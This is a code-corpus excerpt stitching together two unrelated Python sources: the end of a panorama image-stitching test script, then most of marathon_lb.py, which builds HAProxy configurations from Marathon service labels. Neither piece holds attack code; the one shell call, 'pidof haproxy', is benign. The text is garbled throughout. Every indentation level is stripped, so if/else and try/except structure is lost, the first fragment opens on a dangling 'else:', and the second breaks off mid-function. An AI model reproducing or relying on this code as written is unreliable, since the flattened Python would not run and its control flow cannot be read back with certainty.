outpath = './data/panorama/livingroom/processed/'
paths = [
'./data/panorama/livingroom/lr-l.jpg',
'./data/panorama/livingroom/lr-c.jpg',
'./data/panorama/livingroom/lr-r.jpg'
]
else:
# example 2: balcony
outpath = './data/panorama/balcony/processed/'
paths = [
'./data/panorama/balcony/IMG_4189.jpg',
'./data/panorama/balcony/IMG_4190.jpg',
'./data/panorama/balcony/IMG_4191.jpg',
'./data/panorama/balcony/IMG_4188.jpg',
'./data/panorama/balcony/IMG_4192.jpg',
'./data/panorama/balcony/IMG_4187.jpg',
'./data/panorama/balcony/IMG_4193.jpg',
'./data/panorama/balcony/IMG_4186.jpg',
'./data/panorama/balcony/IMG_4194.jpg',
'./data/panorama/balcony/IMG_4185.jpg',
'./data/panorama/balcony/IMG_4195.jpg'
]
imgs = []
np.random.seed(12);
S, T = paths[:2]
with utils.Profiler():
print(paths[0], paths[1])
try:
S, T = utils.Image.load(S, T, float=True)
with utils.Profiler():
T, T_ = stitch(S, T, T, anms, cmax, maskpow=.2, intermediates=imgs if intermediates else None)
imgs.append(T)
except Exception as e:
print(e)
print('error processing: ', paths[0], paths[1], ' skip')
for path in paths[2:]:
print(path)
try:
S = utils.Image.load(path, float=True)
with utils.Profiler():
T, T_ = stitch(S, T, T_, anms, cmax, maskpow=6., intermediates=imgs if intermediates else None)
imgs.append(T)
except Exception as e:
print(e)
print('error processing: ', path, ' skip.')
print('done')
print('saving images...')
if not intermediates:
imgs = imgs[-1:]
for i, img in enumerate(imgs):
if type(img) is np.ndarray:
utils.Image.save((
img, outpath + outprefix + str(i) + '.jpg'
))
else:
img.savefig(
outpath + outprefix + str(i) + '.svg',
dpi=1200, transparent=True, bbox_inches = 'tight', pad_inches=0
)
print(i+1, ' saved...')
# testPanorama(1, 'livingroom-', anms=False, cmax=300, intermediates=False)
# testPanorama(1, 'anms/livingroom-anms-', anms=True, cmax=300, intermediates=False)
# testPanorama(2, 'balcony-', anms=False, cmax=300)
# testPanorama(2, 'balcony-anms-', anms=True, cmax=300)
|
marathon_lb.py
|
#!/usr/bin/env python3
"""# marathon-lb
### Overview
The marathon-lb is a service discovery and load balancing tool
for Marathon based on HAProxy. It reads the Marathon task information
and dynamically generates HAProxy configuration details.
To gather the task information, marathon-lb needs to know where
to find Marathon. The service configuration details are stored in labels.
Every service port in Marathon can be configured independently.
### Configuration
Service configuration lives in Marathon via labels.
Marathon-lb just needs to know where to find Marathon.
### Command Line Usage
"""
import argparse
import hashlib
import json
import logging
import os
import os.path
import random
import re
import shlex
import signal
import stat
import subprocess
import sys
import threading
import time
import datetime
import urllib.parse
from itertools import cycle
from collections import defaultdict
from operator import attrgetter
from shutil import move, copy
from tempfile import mkstemp
import dateutil.parser
import requests
import pycurl
import urllib3.exceptions
from common import (get_marathon_auth_params, set_logging_args,
set_marathon_auth_args, setup_logging, cleanup_json)
from config import ConfigTemplater, label_keys
from lrucache import LRUCache
from utils import (CurlHttpEventStream, get_task_ip_and_ports, ip_cache,
ServicePortAssigner)
logger = logging.getLogger('marathon_lb')
SERVICE_PORT_ASSIGNER = ServicePortAssigner()
class MarathonBackend(object):
def __init__(self, host, ip, port, draining):
self.host = host
"""
The host that is running this task.
"""
self.ip = ip
"""
The IP address used to access the task. For tasks using IP-per-task,
this is the actual IP address of the task; otherwise, it is the IP
address resolved from the hostname.
"""
self.port = port
"""
The port used to access a particular service on a task. For tasks
using IP-per-task, this is the actual port exposed by the task;
otherwise, it is the port exposed on the host.
"""
self.draining = draining
"""
Whether we should be draining access to this task in the LB.
"""
def __hash__(self):
return hash((self.host, self.port))
def __repr__(self):
return "MarathonBackend(%r, %r, %r)" % (self.host, self.ip, self.port)
class MarathonService(object):
def __init__(self, appId, servicePort, healthCheck, strictMode):
self.appId = appId
self.servicePort = servicePort
self.backends = set()
self.hostname = None
self.proxypath = None
self.revproxypath = None
self.redirpath = None
self.haproxy_groups = frozenset()
self.path = None
self.authRealm = None
self.authUser = None
self.authPasswd = None
self.sticky = False
self.enabled = not strictMode
self.redirectHttpToHttps = False
self.useHsts = False
self.sslCert = None
self.bindOptions = None
self.bindAddr = '*'
self.groups = frozenset()
self.mode = None
self.balance = 'roundrobin'
self.healthCheck = healthCheck
self.labels = {}
self.backend_weight = 0
self.network_allowed = None
self.healthcheck_port_index = None
if healthCheck:
if healthCheck['protocol'] == 'HTTP':
self.mode = 'http'
def add_backend(self, host, ip, port, draining):
self.backends.add(MarathonBackend(host, ip, port, draining))
def __hash__(self):
return hash(self.servicePort)
def __eq__(self, other):
return self.servicePort == other.servicePort
def __repr__(self):
return "MarathonService(%r, %r)" % (self.appId, self.servicePort)
class MarathonApp(object):
def __init__(self, marathon, appId, app):
self.app = app
self.groups = frozenset()
self.appId = appId
# port -> MarathonService
self.services = dict()
def __hash__(self):
return hash(self.appId)
def __eq__(self, other):
return self.appId == other.appId
class Marathon(object):
class AllHostsTimeout(Exception):
pass
def __init__(self, hosts, health_check, strict_mode, auth, ca_cert=None):
# TODO(cmaloney): Support getting master list from zookeeper
self.__hosts = hosts
self.__health_check = health_check
self.__strict_mode = strict_mode
self.__auth = auth
self.__cycle_hosts = cycle(self.__hosts)
self.__verify = False
self.current_host = None
if ca_cert:
self.__verify = ca_cert
logger.info('Initializing Marathon connection via hosts: %s',
self.__hosts)
def api_req_raw(self, method, path, auth, body=None, **kwargs):
for i, host in enumerate(self.__hosts):
path_str = os.path.join(host, 'v2', *path)
logger.info('Calling %s %s.', method, path_str)
try:
response = requests.request(
method,
path_str,
auth=auth,
headers={
'Accept': 'application/json',
'Content-Type': 'application/json'
},
timeout=(3.05, 46),
**kwargs
)
logger.debug("%s %s", method, response.url)
if response.ok and i != 0:
# stick to the host with the last successful requests
self.__hosts = self.__hosts[i:] + self.__hosts[:i]
resp_json = cleanup_json(response.json())
if 'message' in resp_json:
response.reason = "%s (%s)" % (
response.reason,
resp_json['message'])
return response
except (requests.exceptions.Timeout,
urllib3.exceptions.TimeoutError,
urllib3.exceptions.MaxRetryError,
IOError):
logger.info('Error calling %s %s, trying next host.',
method, path_str)
logger.debug("%s %s", method, path_str, exc_info=True)
raise self.AllHostsTimeout()
def api_req(self, method, path, **kwargs):
data = self.api_req_raw(method, path, self.__auth,
verify=self.__verify, **kwargs).json()
return cleanup_json(data)
def create(self, app_json):
return self.api_req('POST', ['apps'], app_json)
def get_app(self, appid):
logger.info('fetching app %s', appid)
return self.api_req('GET', ['apps', appid])["app"]
# Lists all running apps.
def list(self):
logger.info('fetching apps')
return self.api_req('GET', ['apps'],
params={'embed': 'apps.tasks'})["apps"]
def health_check(self):
return self.__health_check
def strict_mode(self):
return self.__strict_mode
def tasks(self):
logger.info('fetching tasks')
return self.api_req('GET', ['tasks'])["tasks"]
def get_event_stream(self, events):
self.current_host = self.host
url = self.host + "/v2/events"
if events:
url += "?" + urllib.parse.urlencode({'event_type': events},
doseq=True)
return CurlHttpEventStream(url, self.__auth, self.__verify)
def iter_events(self, stream):
logger.info(
"SSE Active, trying fetch events from {0}".format(stream.url))
class Event(object):
def __init__(self, data):
self.data = data
for line in stream.iter_lines():
if line.strip() != '':
for real_event_data in re.split(r'\r\n',
line.decode('utf-8')):
if real_event_data[:6] == "data: ":
event = Event(data=real_event_data[6:])
yield event
@property
def host(self):
return next(self.__cycle_hosts)
def has_group(groups, app_groups):
# All groups / wildcard match
if '*' in groups:
return True
# empty group only
if len(groups) == 0 and len(app_groups) == 0:
raise Exception("No groups specified")
# Contains matching groups
if (len(frozenset(app_groups) & groups)):
return True
return False
def get_backend_port(apps, app, idx):
"""
Return the port of the idx-th backend of the app which index in apps
is defined by app.healthcheck_port_index.
Example case:
We define an app mapping two ports: 9000 and 9001, that we
scaled to 3 instances.
The port 9000 is used for the app itself, and the port 9001
is used for the app healthchecks. Hence, we have 2 apps
at the marathon level, each with 3 backends (one for each
container).
If app.healthcheck_port_index is set to 1 (via the
HAPROXY_0_BACKEND_HEALTHCHECK_PORT_INDEX label), then
get_backend_port(apps, app, 3) will return the port of the 3rd
backend of the second app.
See https://github.com/mesosphere/marathon-lb/issues/198 for the
actual use case.
Note: if app.healthcheck_port_index has a out of bounds value,
then the app idx-th backend is returned instead.
"""
def get_backends(app):
key_func = attrgetter('host', 'port')
return sorted(list(app.backends), key=key_func)
apps = [_app for _app in apps if _app.appId == app.appId]
# If no healthcheck port index is defined, or if its value is nonsense
# simply return the app port
if app.healthcheck_port_index is None \
or abs(app.healthcheck_port_index) > len(apps):
return get_backends(app)[idx].port
# If a healthcheck port index is defined, fetch the app corresponding
# to the argument app healthcheck port index,
# and return its idx-th backend port
apps = sorted(apps, key=attrgetter('appId', 'servicePort'))
backends = get_backends(apps[app.healthcheck_port_index])
return backends[idx].port
def _get_health_check_options(template, health_check, health_check_port):
return template.format(
healthCheck=health_check,
healthCheckPortIndex=health_check.get('portIndex'),
healthCheckPort=health_check_port,
healthCheckProtocol=health_check['protocol'],
healthCheckPath=health_check.get('path', '/'),
healthCheckTimeoutSeconds=health_check['timeoutSeconds'],
healthCheckIntervalSeconds=health_check['intervalSeconds'],
healthCheckGracePeriodSeconds=health_check['gracePeriodSeconds'],
healthCheckMaxConsecutiveFailures=health_check[
'maxConsecutiveFailures'],
healthCheckFalls=health_check['maxConsecutiveFailures'] + 1,
healthCheckPortOptions=' port ' + str(
health_check_port) if health_check_port else ''
)
def mergeVhostTable(left, right):
result = left.copy()
for key in right:
if key in result:
result[key][0].extend(right[key][0])
result[key][1].update(right[key][1])
result[key][2].update(right[key][2])
else:
result[key] = right[key]
return result
def calculate_server_id(server_name, taken_server_ids):
"""Calculate a stable server id given server name
Calculates stable server id [1] for the given server name [2]
which has following properties:
* is unique/has not been assigned yet
* is an integer from the range 1-32767
* is stable - i.e. calling this function repeatably with the same
server name must yield the same server id.
THE STABILITY OF SERVER_ID IS GUARANTEED IF THE ORDER OF CALLS OF THIS
FUNCTION IS PRESERVED, I.E. THE BACKEND LIST IS SORTED BEFORE
PROCESSING
[1] http://cbonte.github.io/haproxy-dconv/1.8/configuration.html#5.2-id
[2] http://cbonte.github.io/haproxy-dconv/1.8/configuration.html#5.2
Args:
server_name(str): the name of the given backend server
taken_server_ids(set): list of allready assigned server ids
Returns:
An integer depicting the server ID
"""
if server_name == '' or server_name is None:
raise ValueError("Malformed server name: {}".format(server_name))
server_name_encoded = server_name.encode('utf-8')
server_name_shasum = hashlib.sha256(server_name_encoded).hexdigest()
# The number 32767 is not coincidental. It is very important to notice
# in [1] that:
# * due to the use of atol() call [2], server id must not exceed the length
# of 'long int' on a given platform. According to [3] it is at
# least 32bits long so 32bits is a safe limit.
# * the atol() call returns `long int` which is assigned to puid var which
# int turn is `int`. As per [4]:
#
# ```
# On a system where long is wider than int, if the value won't fit in an
# int, then the result of the conversion is implementation-defined. (Or,
# starting in C99, it can raise an implementation-defined signal, but I
# don't know of any compilers that actually do that.) What typically
# happens is that the high-order bits are discarded, but you shouldn't
# depend on that. (The rules are different for unsigned types; the result
# of converting a signed or unsigned integer to an unsigned type is well
# defined.)
# ```
#
# So we need to assume that server id is 16 bit signed integer. Server id
# must be a positive number so this gives us at most 2**15-1 = 32767
# possible server IDs. Beyond that there are dragons and the undefined
# behaviour of the C compiler ;)
#
# [1] https://github.com/haproxy/haproxy/blob/c55b88ece616afe0b28dc81eb39bad37b5f9c33f/src/server.c#L359-L388 # noqa: E501
# [2] https://github.com/haproxy/haproxy/blob/c55b88ece616afe0b28dc81eb39bad37b5f9c33f/src/server.c#L368 # noqa: E501
# [3] https://en.wikipedia.org/wiki/C_data_types
# [4] https://stackoverflow.com/a/13652624
server_id = int(server_name_shasum, 16) % 32767
if server_id not in taken_server_ids and server_id > 0:
taken_server_ids.add(server_id)
return server_id
# We try to solve the collisions by recursively calling
# calculate_backend_id() with the server name argument set to the initial
# server name plus the calculated `server_name_shasum` appended to it.
# This way we should get stable IDs during the next haproxy
# reconfiguration. The more backends there are the more likely the
# collisions will get. Initially the probability is 1/(2**15-1) * 100 =
# 0.003%. As the new_server_id gets longer the sha sum calculation will be
# getting more CPU-heavy and the number of SHA sum calculations per backend
# server will increase. Still - it is unlikely that we will hit the number
# backend server that will this approach a problem - the number of backend
# servers would need to be in the order of thousands.
new_server_name = "{0} {1}".format(server_name, server_name_shasum)
if server_id == 0:
msg_fmt = ("server id == 0 for `%s`, retrying with `%s`")
logger.info(msg_fmt, server_name, new_server_name)
else:
msg_fmt = ("server id collision for `%s`: `%d` was already assigned, "
"retrying with `%s`")
logger.info(msg_fmt, server_name, server_id, new_server_name)
return calculate_server_id(new_server_name, taken_server_ids)
def config(apps, groups, bind_http_https, ssl_certs, templater,
haproxy_map=False, domain_map_array=[], app_map_array=[],
config_file="/etc/haproxy/haproxy.cfg",
group_https_by_vhosts=False):
logger.info("generating config")
config = templater.haproxy_head
groups = frozenset(groups)
duplicate_map = {}
# do not repeat use backend multiple times since map file is same.
_ssl_certs = ssl_certs or "/etc/ssl/cert.pem"
_ssl_certs = _ssl_certs.split(",")
if bind_http_https:
http_frontends = templater.haproxy_http_frontend_head
if group_https_by_vhosts:
https_frontends = templater.haproxy_https_grouped_frontend_head
else:
https_frontends = templater.haproxy_https_frontend_head.format(
sslCerts=" ".join(map(lambda cert: "crt " + cert, _ssl_certs))
)
# This should handle situations where customers have a custom HAPROXY_HEAD
# that includes the 'daemon' flag or does not expose listener fds:
if 'daemon' in config.split() or "expose-fd listeners" not in config:
upgrade_warning = '''\
Error in custom HAPROXY_HEAD template: \
In Marathon-LB 1.12, the default HAPROXY_HEAD section changed, please \
make the following changes to your custom template: Remove "daemon", \
Add "stats socket /var/run/haproxy/socket expose-fd listeners". \
More information can be found here: \
https://docs.mesosphere.com/services/marathon-lb/advanced/#global-template.\
'''
raise Exception(upgrade_warning)
userlists = str()
frontends = str()
backends = str()
http_appid_frontends = templater.haproxy_http_frontend_appid_head
apps_with_http_appid_backend = []
http_frontend_list = []
https_frontend_list = []
https_grouped_frontend_list = defaultdict(lambda: ([], set(), set()))
haproxy_dir = os.path.dirname(config_file)
logger.debug("HAProxy dir is %s", haproxy_dir)
for app in sorted(apps, key=attrgetter('appId', 'servicePort')):
# App only applies if we have it's group
# Check if there is a haproxy group associated with service group
# if not fallback to original HAPROXY group.
# This is added for backward compatability with HAPROXY_GROUP
if app.haproxy_groups:
if not has_group(groups, app.haproxy_groups):
continue
else:
if not has_group(groups, app.groups):
continue
# Skip if it's not actually enabled
if not app.enabled:
continue
logger.debug("configuring app %s", app.appId)
if len(app.backends) < 1:
logger.error("skipping app %s as it is not valid to generate" +
" backend without any server entries!", app.appId)
continue
backend = app.appId[1:].replace('/', '_') + '_' + str(app.servicePort)
logger.debug("frontend at %s:%d with backend %s",
app.bindAddr, app.servicePort, backend)
# If app has HAPROXY_{n}_MODE set, use that setting.
# Otherwise use 'http' if HAPROXY_{N}_VHOST is set, and 'tcp' if not.
if app.mode is None:
if app.hostname:
app.mode = 'http'
else:
app.mode = 'tcp'
if app.authUser:
userlist_head = templater.haproxy_userlist_head(app)
userlists += userlist_head.format(
backend=backend,
user=app.authUser,
passwd=app.authPasswd
)
frontend_head = templater.haproxy_frontend_head(app)
frontends += frontend_head.format(
bindAddr=app.bindAddr,
backend=backend,
servicePort=app.servicePort,
mode=app.mode,
sslCert=' ssl crt ' + app.sslCert if app.sslCert else '',
bindOptions=' ' + app.bindOptions if app.bindOptions else ''
)
backend_head = templater.haproxy_backend_head(app)
backends += backend_head.format(
backend=backend,
balance=app.balance,
mode=app.mode
)
# if a hostname is set we add the app to the vhost section
# of our haproxy config
# TODO(lloesche): Check if the hostname is already defined by another
# service
if bind_http_https and app.hostname:
backend_weight, p_fe, s_fe, g_fe = \
generateHttpVhostAcl(templater,
app,
backend,
haproxy_map,
domain_map_array,
haproxy_dir,
duplicate_map)
http_frontend_list.append((backend_weight, p_fe))
https_frontend_list.append((backend_weight, s_fe))
if group_https_by_vhosts:
https_grouped_frontend_list = mergeVhostTable(
https_grouped_frontend_list, g_fe)
# if app mode is http, we add the app to the second http frontend
# selecting apps by http header X-Marathon-App-Id
if app.mode == 'http' and \
app.appId not in apps_with_http_appid_backend:
logger.debug("adding virtual host for app with id %s", app.appId)
# remember appids to prevent multiple entries for the same app
apps_with_http_appid_backend += [app.appId]
cleanedUpAppId = re.sub(r'[^a-zA-Z0-9\-]', '_', app.appId)
if haproxy_map:
if 'map_http_frontend_appid_acl' not in duplicate_map:
http_appid_frontend_acl = templater \
.haproxy_map_http_frontend_appid_acl(app)
http_appid_frontends += http_appid_frontend_acl.format(
haproxy_dir=haproxy_dir
)
duplicate_map['map_http_frontend_appid_acl'] = 1
map_element = {}
map_element[app.appId] = backend
if map_element not in app_map_array:
app_map_array.append(map_element)
else:
http_appid_frontend_acl = templater \
.haproxy_http_frontend_appid_acl(app)
http_appid_frontends += http_appid_frontend_acl.format(
cleanedUpAppId=cleanedUpAppId,
hostname=app.hostname,
appId=app.appId,
backend=backend
)
if app.mode == 'http':
if app.useHsts:
backends += templater.haproxy_backend_hsts_options(app)
backends += templater.haproxy_backend_http_options(app)
backend_http_backend_proxypass = templater \
.haproxy_http_backend_proxypass_glue(app)
if app.proxypath:
backends += backend_http_backend_proxypass.format(
hostname=app.hostname,
proxypath=app.proxypath
)
backend_http_backend_revproxy = templater \
.haproxy_http_backend_revproxy_glue(app)
if app.revproxypath:
backends += backend_http_backend_revproxy.format(
hostname=app.hostname,
rootpath=app.revproxypath
)
backend_http_backend_redir = templater \
.haproxy_http_backend_redir(app)
if app.redirpath:
backends += backend_http_backend_redir.format(
hostname=app.hostname,
redirpath=app.redirpath
)
# Set network allowed ACLs
if app.mode == 'http' and app.network_allowed:
for network in app.network_allowed.split():
backends += templater.\
haproxy_http_backend_network_allowed_acl(app).\
format(network_allowed=network)
backends += templater.haproxy_http_backend_acl_allow_deny
elif app.mode == 'tcp' and app.network_allowed:
for network in app.network_allowed.split():
backends += templater.\
haproxy_tcp_backend_network_allowed_acl(app).\
format(network_allowed=network)
backends += templater.haproxy_tcp_backend_acl_allow_deny
if app.sticky:
logger.debug("turning on sticky sessions")
backends += templater.haproxy_backend_sticky_options(app)
frontend_backend_glue = templater.haproxy_frontend_backend_glue(app)
frontends += frontend_backend_glue.format(backend=backend)
do_backend_healthcheck_options_once = True
key_func = attrgetter('host', 'port')
taken_server_ids = set()
for backend_service_idx, backendServer\
in enumerate(sorted(app.backends, key=key_func)):
if do_backend_healthcheck_options_once:
if app.healthCheck:
template_backend_health_check = None
if app.mode == 'tcp' \
or app.healthCheck['protocol'] == 'TCP' \
or app.healthCheck['protocol'] == 'MESOS_TCP':
template_backend_health_check = templater \
.haproxy_backend_tcp_healthcheck_options(app)
elif app.mode == 'http':
template_backend_health_check = templater \
.haproxy_backend_http_healthcheck_options(app)
if template_backend_health_check:
health_check_port = get_backend_port(
apps,
app,
backend_service_idx)
backends += _get_health_check_options(
template_backend_health_check,
app.healthCheck,
health_check_port)
do_backend_healthcheck_options_once = False
logger.debug(
"backend server %s:%d on %s",
backendServer.ip,
backendServer.port,
backendServer.host)
# Create a unique, friendly name for the backend server. We concat
# the host, task IP and task port together. If the host and task
# IP are actually the same then omit one for clarity.
if backendServer.host != backendServer.ip:
serverName = re.sub(
r'[^a-zA-Z0-9\-]', '_',
(backendServer.host + '_' +
backendServer.ip + '_' +
str(backendServer.port)))
else:
serverName = re.sub(
r'[^a-zA-Z0-9\-]', '_',
(backendServer.ip + '_' +
str(backendServer.port)))
shortHashedServerName = hashlib.sha1(serverName.encode()) \
.hexdigest()[:10]
# In order to keep the state of backend servers consistent between
# reloads, server IDs need to be stable. See
# calculate_backend_id()'s docstring to learn how it is achieved.
server_id = calculate_server_id(serverName, taken_server_ids)
server_health_check_options = None
if app.healthCheck:
template_server_healthcheck_options = None
if app.mode == 'tcp' \
or app.healthCheck['protocol'] == 'TCP' \
or app.healthCheck['protocol'] == 'MESOS_TCP':
template_server_healthcheck_options = templater \
.haproxy_backend_server_tcp_healthcheck_options(app)
elif app.mode == 'http':
template_server_healthcheck_options = templater \
.haproxy_backend_server_http_healthcheck_options(app)
if template_server_healthcheck_options:
if app.healthcheck_port_index is not None:
health_check_port = \
get_backend_port(apps, app, backend_service_idx)
else:
health_check_port = app.healthCheck.get('port')
server_health_check_options = _get_health_check_options(
template_server_healthcheck_options,
app.healthCheck,
health_check_port)
backend_server_options = templater \
.haproxy_backend_server_options(app)
backends += backend_server_options.format(
host=backendServer.host,
host_ipv4=backendServer.ip,
port=backendServer.port,
serverName=serverName,
serverId=server_id,
cookieOptions=' check cookie ' + shortHashedServerName
if app.sticky else '',
healthCheckOptions=server_health_check_options
if server_health_check_options else '',
otherOptions=' disabled' if backendServer.draining else ''
)
http_frontend_list.sort(key=lambda x: x[0], reverse=True)
https_frontend_list.sort(key=lambda x: x[0], reverse=True)
for backend in http_frontend_list:
http_frontends += backend[1]
if group_https_by_vhosts:
for backend in sorted(https_grouped_frontend_list.keys()):
https_frontends +=\
templater.haproxy_https_grouped_vhost_frontend_acl.format(
backend=re.sub(r'[^a-zA-Z0-9\-]', '_', backend),
host=backend)
else:
for backend in https_frontend_list:
https_frontends += backend[1]
config += userlists
if bind_http_https:
config += http_frontends
config += http_appid_frontends
if bind_http_https:
config += https_frontends
if group_https_by_vhosts:
for vhost in sorted(https_grouped_frontend_list.keys()):
config +=\
templater\
.haproxy_https_grouped_vhost_backend_head\
.format(
name=re.sub(r'[^a-zA-Z0-9\-]', '_', vhost))
frontend = templater \
.haproxy_https_grouped_vhost_frontend_head \
.format(name=re.sub(r'[^a-zA-Z0-9\-]', '_', vhost),
sslCerts=" ".join(
map(lambda cert: "crt " + cert,
defaultValue(
https_grouped_frontend_list[vhost][1],
set(_ssl_certs)))),
bindOpts=" ".join(
map(lambda opts: " " + opts,
https_grouped_frontend_list[vhost][2]))
)
for v in sorted(
https_grouped_frontend_list[vhost][0],
key=lambda x: x[0],
reverse=True):
frontend += v[1]
config += frontend
config += frontends
config += backends
return config
def defaultValue(col, default):
if len(col) == 0:
return default
else:
return col
def get_haproxy_pids():
try:
return set(map(lambda i: int(i), subprocess.check_output(
"pidof haproxy",
stderr=subprocess.STDOUT,
shell=True).split()))
except subprocess.CalledProcessError as ex:
logger.debug("Unable to get haproxy pids: %s", ex)
return set()
def reloadConfig():
reloadCommand = []
if args.command:
reloadCommand = shlex.split(args.command)
else:
logger.debug("No reload command provided, trying to find out how to" +
" reload the configuration")
if os.path.isfile('/etc/init/haproxy.conf'):
logger.debug("we seem to be running on an Upstart based system")
reloadCommand = ['reload', 'haproxy']
elif (os.path.isfile('/usr/lib/systemd/system/haproxy.service') or
os.path.isfile('/lib/systemd/system/haproxy.service') or
os.path.isfile('/etc/systemd/system/haproxy.service')):
logger.debug("we seem to be running on systemd based system")
reloadCommand = ['systemctl', 'reload', 'haproxy']
elif os.path.isfile('/etc/init.d/haproxy'):
logger.debug("we seem to be running on a sysvinit based system")
reloadCommand = ['/etc/init.d/haproxy', 'reload']
else:
# if no haproxy exists (maybe running in a container)
logger.debug("no haproxy detected. won't reload.")
reloadCommand = None
if reloadCommand:
logger.info("reloading using %s", " ".join(reloadCommand))
try:
start_time = time.time()
checkpoint_time = start_time
# Retry or log the reload every 10 seconds
reload_frequency = args.reload_interval
reload_retries = args.max_reload_retries
enable_retries = True
infinite_retries = False
if reload_retries == 0:
enable_retries = False
elif reload_retries < 0:
infinite_retries = True
old_pids = get_haproxy_pids()
subprocess.check_call(reloadCommand, close_fds=True)
new_pids = get_haproxy_pids()
logger.debug("Waiting for new haproxy pid (old pids: [%s], " +
"new_pids: [%s])...", old_pids, new_pids)
# Wait until the reload actually occurs and there's a new PID
while True:
if len(new_pids - old_pids) >= 1:
logger.debug("new pids: [%s]", new_pids)
logger.debug("reload finished, took %s seconds",
time.time() - start_time)
break
timeSinceCheckpoint = time.time() - checkpoint_time
if (timeSinceCheckpoint >= reload_frequency):
logger.debug("Still waiting for new haproxy pid after " +
"%s seconds (old pids: [%s], " +
"new_pids: [%s]).",
time.time() - start_time, old_pids, new_pids)
checkpoint_time = time.time()
if enable_retries:
if not infinite_retries:
reload_retries -= 1
if reload_retries == 0:
logger.debug("reload failed after %s seconds",
time.time() - start_time)
break
logger.debug("Attempting reload again...")
subprocess.check_call(reloadCommand, close_fds=True)
time.sleep(0.1)
new_pids = get_haproxy_pids()
except OSError as ex:
logger.error("unable to reload config using command %s",
" ".join(reloadCommand))
logger.error("OSError: %s", ex)
except subprocess.CalledProcessError as ex:
logger.error("unable to reload config using command %s",
" ".join(reloadCommand))
logger.error("reload returned non-zero: %s", ex)
def generateHttpVhostAcl(
templater, app, backend, haproxy_map, map_array,
haproxy_dir, duplicate_map):
# If the hostname contains the delimiter ',', then the marathon app is
# requesting multiple hostname matches for the same backend, and we need
# to use alternate templates from the default one-acl/one-use_backend.
staging_http_frontends = ""
staging_https_frontends = ""
https_grouped_frontend_list = defaultdict(lambda: ([], set(), set()))
if "," in app.hostname:
logger.debug(
"vhost label specifies multiple hosts: %s", app.hostname)
vhosts = app.hostname.split(',')
acl_name = re.sub(r'[^a-zA-Z0-9\-]', '_', vhosts[0]) + \
'_' + app.appId[1:].replace('/', '_')
if app.path:
if app.authRealm:
# Set the path ACL if it exists
logger.debug("adding path acl, path=%s", app.path)
http_frontend_acl = \
templater.\
haproxy_http_frontend_acl_only_with_path_and_auth(app)
staging_http_frontends += http_frontend_acl.format(
path=app.path,
cleanedUpHostname=acl_name,
hostname=vhosts[0],
realm=app.authRealm,
backend=backend
)
https_frontend_acl = \
templater.\
haproxy_https_frontend_acl_only_with_path(app)
staging_https_frontends += https_frontend_acl.format(
path=app.path,
cleanedUpHostname=acl_name,
hostname=vhosts[0],
realm=app.authRealm,
backend=backend
)
else:
# Set the path ACL if it exists
logger.debug("adding path acl, path=%s", app.path)
http_frontend_acl = \
templater.haproxy_http_frontend_acl_only_with_path(app)
staging_http_frontends += http_frontend_acl.format(
path=app.path,
backend=backend
)
https_frontend_acl = \
templater.haproxy_https_frontend_acl_only_with_path(app)
staging_https_frontends += https_frontend_acl.format(
path=app.path,
backend=backend
)
temp_frontend_head = staging_https_frontends
for vhost_hostname in vhosts:
https_grouped_frontend_list[vhost_hostname][0].append(
(app.backend_weight, temp_frontend_head))
if app.sslCert is not None:
https_grouped_frontend_list[vhost_hostname][1].add(app.sslCert)
if app.bindOptions is not None:
https_grouped_frontend_list[vhost_hostname][2].add(
app.bindOptions)
logger.debug("processing vhost %s", vhost_hostname)
if haproxy_map and not app.path and not app.authRealm and \
not app.redirectHttpToHttps:
if 'map_http_frontend_acl' not in duplicate_map:
app.backend_weight = -1
http_frontend_acl = templater.\
haproxy_map_http_frontend_acl_only(app)
staging_http_frontends += http_frontend_acl.format(
haproxy_dir=haproxy_dir
)
duplicate_map['map_http_frontend_acl'] = 1
map_element = {}
map_element[vhost_hostname] = backend
if map_element not in map_array:
map_array.append(map_element)
else:
http_frontend_acl = templater.\
haproxy_http_frontend_acl_only(app)
staging_http_frontends += http_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=vhost_hostname
)
# Tack on the SSL ACL as well
if app.path:
if app.authRealm:
https_frontend_acl = templater.\
haproxy_https_frontend_acl_with_auth_and_path(app)
staging_https_frontend = https_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=vhost_hostname,
appId=app.appId,
realm=app.authRealm,
backend=backend
)
staging_https_frontends += staging_https_frontend
https_grouped_frontend_list[vhost_hostname][0].append(
(app.backend_weight, staging_https_frontend))
else:
https_frontend_acl = \
templater.haproxy_https_frontend_acl_with_path(app)
staging_https_frontend = https_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=vhost_hostname,
appId=app.appId,
backend=backend
)
staging_https_frontends += staging_https_frontend
https_grouped_frontend_list[vhost_hostname][0].append(
(app.backend_weight, staging_https_frontend))
else:
if app.authRealm:
https_frontend_acl = \
templater.haproxy_https_frontend_acl_with_auth(app)
staging_https_frontend = https_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=vhost_hostname,
appId=app.appId,
realm=app.authRealm,
backend=backend
)
staging_https_frontends += staging_https_frontend
https_grouped_frontend_list[vhost_hostname][0].append(
(app.backend_weight, staging_https_frontend))
else:
if haproxy_map:
if 'map_https_frontend_acl' not in duplicate_map:
app.backend_weight = -1
https_frontend_acl = templater.\
haproxy_map_https_frontend_acl(app)
staging_https_frontend = https_frontend_acl. \
format(
hostname=vhost_hostname,
haproxy_dir=haproxy_dir
)
staging_https_frontends += staging_https_frontend
https_grouped_frontend_list[vhost_hostname][0]\
.append(
(app.backend_weight, staging_https_frontend))
duplicate_map['map_https_frontend_acl'] = 1
map_element = {}
map_element[vhost_hostname] = backend
if map_element not in map_array:
map_array.append(map_element)
else:
https_frontend_acl = templater.\
haproxy_https_frontend_acl(app)
staging_https_frontend = https_frontend_acl.format(
cleanedUpHostname=acl_name,
hostname=vhost_hostname,
appId=app.appId,
backend=backend
)
staging_https_frontends += staging_https_frontend
https_grouped_frontend_list[vhost_hostname][0].append(
(app.backend_weight, staging_https_frontend))
# We've added the http acl lines, now route them to the same backend
if app.redirectHttpToHttps:
logger.debug("writing rule to redirect http to https traffic")
if app.path:
haproxy_backend_redirect_http_to_https = \
templater.\
haproxy_backend_redirect_http_to_https_with_path(app)
frontend = haproxy_backend_redirect_http_to_https.format(
bindAddr=app.bindAddr,
cleanedUpHostname=acl_name,
backend=backend
)
staging_http_frontends += frontend
else:
haproxy_backend_redirect_http_to_https = \
templater.haproxy_backend_redirect_http_to_https(app)
frontend = haproxy_backend_redirect_http_to_https.format(
bindAddr=app.bindAddr,
cleanedUpHostname=acl_name
)
staging_http_frontends += frontend
elif app.path:
if app.authRealm:
